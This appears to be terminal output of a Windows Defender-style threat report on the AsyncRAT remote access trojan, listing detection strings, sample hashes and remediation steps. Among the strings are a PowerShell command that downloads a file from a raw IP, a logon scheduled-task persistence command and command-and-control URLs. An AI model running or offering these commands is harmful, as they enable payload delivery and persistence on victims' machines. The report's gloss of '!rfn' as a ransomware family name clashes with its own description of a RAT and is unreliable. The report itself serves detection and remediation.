$ analyze-threat Trojan:Win64/AsyncRat!rfn
Trojan:Win64/AsyncRat!rfn - Windows Defender threat signature analysis

$ cat analysis.txt
=== THREAT ANALYSIS REPORT ===
Threat Name: Trojan:Win64/AsyncRat!rfn
Classification:
  Type: Trojan
  Platform: Win64
  Family: AsyncRat
  Detection Type: Concrete (known malware family with identified signatures)
  Suffix: !rfn (specific ransomware family name)
  Confidence: Very High
  False-Positive Risk: Low

Concrete signature match: Trojan (appears legitimate but performs malicious actions), 64-bit Windows platform, family AsyncRat

Summary:

Trojan:Win64/AsyncRat!rfn is a sophisticated Remote Access Trojan (RAT) that uses techniques such as script-based execution, abuse of legitimate processes (MSBuild.exe), and persistence mechanisms to gain remote control over the compromised system. It is designed to exfiltrate sensitive data, communicate with command and control servers (e.g., `serverupdates48.ga`), and encrypt its communications, posing a significant threat to data confidentiality and system integrity.

Severity: Critical
VDM Static Detection:
Relevant strings associated with this threat:
 - Set ZpXcmsCQ = CreateObject("Wscript.Shell") (MACROHSTR_EXT)
 - ZpXcmsCQ.Run rdeAjnshv + lqfadUMW + AKrDsxioC, RValue (MACROHSTR_EXT)
 - Set fso = CreateObject("Scripting.FileSystemObject") (PEHSTR_EXT)
 -  & "\ (PEHSTR_EXT)
 - .xml" (PEHSTR_EXT)
 - Set object_Shell = CreateObject("Shell.Application") (PEHSTR_EXT)
 - object_Shell.ShellExecute "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe",  (PEHSTR_EXT)
 - COM Surrogate (PEHSTR_EXT)
 - trevnoC.metsyS (PEHSTR_EXT)
 - CompressionMode (PEHSTR_EXT)
 - TripleDESCryptoServiceProvider (PEHSTR_EXT)
 - https://ufile.io/rftaeqtc (PEHSTR_EXT)
 - Software\Microsoft\Windows\CurrentVersion\Run (PEHSTR_EXT)
 - http://serverupdates48.ga/test (PEHSTR_EXT)
 - HttpWebRequest (PEHSTR_EXT)
 - CarRentalSystem\obj\Debug\Dash.pdb (PEHSTR_EXT)
 - crypted.exe (PEHSTR_EXT)
 - sqkpikos.pdb (PEHSTR_EXT)
 - HCS Computers & Laptops (PEHSTR_EXT)
 - Client.Install (PEHSTR_EXT)
 - GetExecutingAssembly (PEHSTR_EXT)
 - System.Windows.Forms (PEHSTR_EXT)
 - System.Reflection (PEHSTR_EXT)
 - B.text (PEHSTR_EXT)
 - setUTCMinutesTU Jurassic.Library.JSFunctionFlags (PEHSTR_EXT)
 - calc_pro.Form1.resources (PEHSTR_EXT)
 - payload.exe (PEHSTR_EXT)
 - get_Computer (PEHSTR_EXT)
 - Dotfuscated\windwos.pdb (PEHSTR_EXT)
 - windwos.My (PEHSTR_EXT)
 - 134.122.133.49 (PEHSTR_EXT)
 - Client.bin (PEHSTR_EXT)
 - Select * From Win32_ComputerSystem (PEHSTR_EXT)
 - Dotfuscated\CryptoObfuscator_Output\v4.pdb (PEHSTR_EXT)
 - v4.Resources.resources (PEHSTR_EXT)
 - windwos.pdb (PEHSTR_EXT)
 - petrolmanagementsystem.Supplier_withdraw_pump_bank_detail.resources (PEHSTR_EXT)
 - \x64\Release\WechatAnd.pdb (PEHSTR_EXT)
 - windwos\bin\Debug\Dotfuscated\windwos.pdb (PEHSTR_EXT)
 - server.Resources.resources (PEHSTR_EXT)
 - RAT\AsyncRat_0313\rat_Client\rat_pro\obj\Debug\rat_pro.pdb (PEHSTR_EXT)
 - 9ubmFjIG1hcmdvcnAgc2loVCHNTAG4Ic (PEHSTR_EXT)
 - set_UseShellExecute (PEHSTR_EXT)
 - \RatClientTest.pdb (PEHSTR)
 - Ymcfcbdts.Properties (PEHSTR_EXT)
 - Stub.g.resources (PEHSTR)
 - RunHiddenCommand (PEHSTR)
 - RawAccel.exe (PEHSTR)
 - seftali\x64\Release\seftali.pdb (PEHSTR_EXT)
 - loader\x64\Release\Espio.pdb (PEHSTR_EXT)
 - powershell(new-object System.Net.WebClient).DownloadFile('http://149.88.66.68/test.mp3','%Temp%/test.bin') (PEHSTR_EXT)
 - schtasks /create /f /sc onlogon /rl highest /tn (PEHSTR_EXT)
 - Stub.exe (PEHSTR_EXT)
 - nuR\noisreVtnerruC\swodniW\tfosorciM\erawtfoS (PEHSTR_EXT)
 - Skipping Annabelle.exe (PEHSTR_EXT)
 - powershell.exe (PEHSTR_EXT)
 - ExecutionPolicy Bypass -File (PEHSTR_EXT)
 - !#HSTR:StringCodeForMshta.A!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForHooking.C!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForHooking.D!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForHooking.L!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForHooking.O!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForRegsvr32.A!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForRundll32.A!pli (PEHSTR_EXT)
 - rundll32 (PEHSTR_EXT)
 - !#HSTR:StringCodeForBITSJobs.A!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForPowerShell.G!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForScheduledTask.A!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForDataEncoding.D!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForHooking.J!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForHooking.K!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForRemoteFileCopy.B!pli (PEHSTR_EXT)
 - !#HSTR:ExecutionGuardrails (PEHSTR_EXT)
 - !#HSTR:StringCodeForFileDeletion.A!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForHooking.M!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForNetshHelperDLL.A!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForRemoteServices.A!pli (PEHSTR_EXT)
Known malware which is associated with this threat:
 - Filename: 94e6cf4122215224008285277ee1f4df61a7739c8c85ed569f112d70ce8b998f
   Hash: 94e6cf4122215224008285277ee1f4df61a7739c8c85ed569f112d70ce8b998f
   Date: 13/12/2025
 - Filename: 32746cb823dcd1f3e79a5fb4843bbdf5a65a8f023649e.exe
   Hash: 32746cb823dcd1f3e79a5fb4843bbdf5a65a8f023649e46137420b399151febf
   Date: 08/12/2025
Remediation Steps:
Immediately isolate the affected system from the network. Perform a full system scan with updated Windows Defender and ensure all detected malicious files are removed. Manually inspect and remove any persistence mechanisms (e.g., `Run` registry keys, scheduled tasks). Block associated command and control domains like `serverupdates48.ga` at the network perimeter. Change all user and administrative credentials that may have been compromised.
=== END REPORT ===
$ reanalyze-threat
This analysis was last updated on 08/12/2025. Do you want to analyze it again?